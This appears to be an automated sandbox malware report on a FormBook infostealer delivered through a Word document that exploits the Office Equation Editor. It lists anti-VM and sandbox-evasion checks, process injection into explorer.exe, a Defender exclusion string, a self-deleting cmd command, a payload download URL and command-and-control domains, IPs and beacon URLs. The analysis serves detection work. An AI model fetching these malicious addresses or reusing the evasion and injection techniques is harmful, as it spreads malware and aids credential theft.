          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE5
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: ~WRF{79E0ADDF-4BCA-42D2-95DC-650BFEE60233}.tmp.0.drStream path '_1696857852/\x1OLe10NATivE' entropy: 7.99643695753 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 4.2.villar8681.exe.2500978.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.427737802.00000000024D1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: villar8681.exe PID: 2808, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: villar8681.exe, 00000004.00000002.427737802.00000000024D1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: villar8681.exe, 00000004.00000002.427737802.00000000024D1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Roaming\villar8681.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\villar8681.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000000089904 second address: 000000000008990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000000089B6E second address: 0000000000089B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1184Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\villar8681.exe TID: 1188Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 1724Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\SysWOW64\raserver.exe TID: 2012Thread sleep time: -32000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00409AA0 rdtsc
          Source: C:\Users\user\AppData\Roaming\villar8681.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Roaming\villar8681.exeThread delayed: delay time: 922337203685477
          Source: villar8681.exe, 00000004.00000002.427737802.00000000024D1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000006.00000000.437869266.000000000031D000.00000004.00000020.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.437621444.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: villar8681.exe, 00000004.00000002.427737802.00000000024D1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: villar8681.exe, 00000004.00000002.427737802.00000000024D1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.451281002.0000000004513000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0)\Co>
          Source: explorer.exe, 00000006.00000000.506462418.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000006.00000000.442969778.00000000044E7000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
          Source: explorer.exe, 00000006.00000000.428319083.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000006.00000000.506586274.00000000045CF000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: villar8681.exe, 00000004.00000002.427737802.00000000024D1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00409AA0 rdtsc
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008826F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_021926F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0040ACE0 LdrLoadDll,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.charlotte-s-creations.com
          Source: C:\Windows\explorer.exeNetwork Connect: 54.156.84.168 80
          Source: C:\Windows\explorer.exeDomain query: www.filecrev.com
          Source: C:\Windows\explorer.exeNetwork Connect: 202.165.66.108 80
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Roaming\villar8681.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: 740000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Roaming\villar8681.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\villar8681.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\villar8681.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\AppData\Roaming\villar8681.exeMemory written: C:\Users\user\AppData\Roaming\villar8681.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\villar8681.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\villar8681.exeThread register set: target process: 1764
          Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 1764
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\villar8681.exe C:\Users\user\AppData\Roaming\villar8681.exe
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess created: C:\Users\user\AppData\Roaming\villar8681.exe C:\Users\user\AppData\Roaming\villar8681.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\villar8681.exe'
          Source: explorer.exe, 00000006.00000000.503298615.0000000000750000.00000002.00020000.sdmp, raserver.exe, 00000007.00000002.679827262.0000000000A80000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.437621444.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
          Source: explorer.exe, 00000006.00000000.503298615.0000000000750000.00000002.00020000.sdmp, raserver.exe, 00000007.00000002.679827262.0000000000A80000.00000002.00020000.sdmpBinary or memory string: !Progman
          Source: explorer.exe, 00000006.00000000.503298615.0000000000750000.00000002.00020000.sdmp, raserver.exe, 00000007.00000002.679827262.0000000000A80000.00000002.00020000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\user\AppData\Roaming\villar8681.exeQueries volume information: C:\Users\user\AppData\Roaming\villar8681.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\villar8681.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.0.villar8681.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.villar8681.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.villar8681.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.villar8681.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.villar8681.exe.365d7a0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.villar8681.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.villar8681.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.villar8681.exe.360e380.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.679408045.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.446496993.00000000090FF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.462947003.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.424304556.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.679459797.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.454018128.00000000090FF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.462778282.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.679586100.00000000002F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.427990655.00000000034D9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.424856799.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.0.villar8681.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.villar8681.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.villar8681.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.villar8681.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.villar8681.exe.365d7a0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.villar8681.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.villar8681.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.villar8681.exe.360e380.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.679408045.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.446496993.00000000090FF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.462947003.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.424304556.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.679459797.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.454018128.00000000090FF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.462778282.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.679586100.00000000002F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.427990655.00000000034D9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.424856799.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsCommand and Scripting Interpreter2Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery321Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsExtra Window Memory Injection1Masquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information41DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Extra Window Memory Injection1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 510256 Sample: Purchase order.doc Startdate: 27/10/2021 Architecture: WINDOWS Score: 100 39 www.tapehitsscriptsparty.com 2->39 55 Multi AV Scanner detection for domain / URL 2->55 57 Found malware configuration 2->57 59 Malicious sample detected (through community Yara rule) 2->59 61 15 other signatures 2->61 11 EQNEDT32.EXE 11 2->11         started        16 WINWORD.EXE 291 20 2->16         started        signatures3 process4 dnsIp5 47 binatonezx.tk 2.56.59.211, 49167, 80 GBTCLOUDUS Netherlands 11->47 33 C:\Users\user\AppData\...\villar8681.exe, PE32 11->33 dropped 35 C:\Users\user\AppData\...\villarzx[1].exe, PE32 11->35 dropped 79 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->79 18 villar8681.exe 1 5 11->18         started        37 ~WRF{79E0ADDF-4BCA...C-650BFEE60233}.tmp, Composite 16->37 dropped file6 signatures7 process8 signatures9 49 Multi AV Scanner detection for dropped file 18->49 51 Tries to detect virtualization through RDTSC time measurements 18->51 53 Injects a PE file into a foreign processes 18->53 21 villar8681.exe 18->21         started        process10 signatures11 63 Modifies the context of a thread in another process (thread injection) 21->63 65 Maps a DLL or memory area into another process 21->65 67 Sample uses process hollowing technique 21->67 69 Queues an APC in another process (thread injection) 21->69 24 explorer.exe 21->24 injected process12 dnsIp13 41 www.filecrev.com 202.165.66.108, 49168, 80 VPIS-APVADSManagedBusinessInternetServiceProviderMY Australia 24->41 43 www.charlotte-s-creations.com 24->43 45 2 other IPs or domains 24->45 71 System process connects to network (likely due to code injection or exploit) 24->71 28 raserver.exe 24->28         started        signatures14 process15 signatures16 73 Modifies the context of a thread in another process (thread injection) 28->73 75 Maps a DLL or memory area into another process 28->75 77 Tries to detect virtualization through RDTSC time measurements 28->77 31 cmd.exe 28->31         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Purchase order.doc40%VirustotalBrowse
          Purchase order.doc34%ReversingLabsDocument-RTF.Exploit.Heuristic

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{79E0ADDF-4BCA-42D2-95DC-650BFEE60233}.tmp100%AviraEXP/CVE-2017-11882.Gen
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{79E0ADDF-4BCA-42D2-95DC-650BFEE60233}.tmp100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\villarzx[1].exe38%ReversingLabsByteCode-MSIL.Backdoor.Androm
          C:\Users\user\AppData\Roaming\villar8681.exe38%ReversingLabsByteCode-MSIL.Backdoor.Androm

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.0.villar8681.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.villar8681.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.villar8681.exe.400000.9.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.villar8681.exe.400000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          binatonezx.tk15%VirustotalBrowse
          www.filecrev.com5%VirustotalBrowse
          www.charlotte-s-creations.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.mozilla.com00%URL Reputationsafe
          www.filecrev.com/jy0b/0%Avira URL Cloudsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          https://www.charlotte-s-creations.com/jy0b/?06384Dqp=AerW1ym2Fscv670%Avira URL Cloudsafe
          http://treyresearch.net0%URL Reputationsafe
          http://www.collada.org/2005/11/COLLADASchema9Done0%URL Reputationsafe
          http://java.sun.com0%Avira URL Cloudsafe
          http://www.filecrev.com/jy0b/?06384Dqp=TyGDJhL/cA+57wfufaZRyMMrQk8uPd2d6NfY81Rsj46bZhOJLXgZ522BupBE7+BqQsP88Q==&ct=Xhh4nL38YNvpj0%Avira URL Cloudsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://www.charlotte-s-creations.com/jy0b/?06384Dqp=AerW1ym2Fscv67+RpL/0se6tZB+gK2Llczeyi+qylm7PPSapsOoYwZFX50tzMVhi1EMssA==&ct=Xhh4nL38YNvpj0%Avira URL Cloudsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://binatonezx.tk/villarzx.exe100%Avira URL Cloudmalware
          http://servername/isapibackend.dll0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          caddy-2-4-3-a154c717787f8b4f.elb.us-east-1.amazonaws.com
          		54.156.84.168
          		truefalse
            		high
            binatonezx.tk
            		2.56.59.211
            		truetrueunknown
            www.filecrev.com
            		202.165.66.108
            		truetrueunknown
            www.charlotte-s-creations.com
            		unknown
            		unknowntrueunknown
            www.tapehitsscriptsparty.com
            		unknown
            		unknowntrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              www.filecrev.com/jy0b/true
              • Avira URL Cloud: safe
              		low
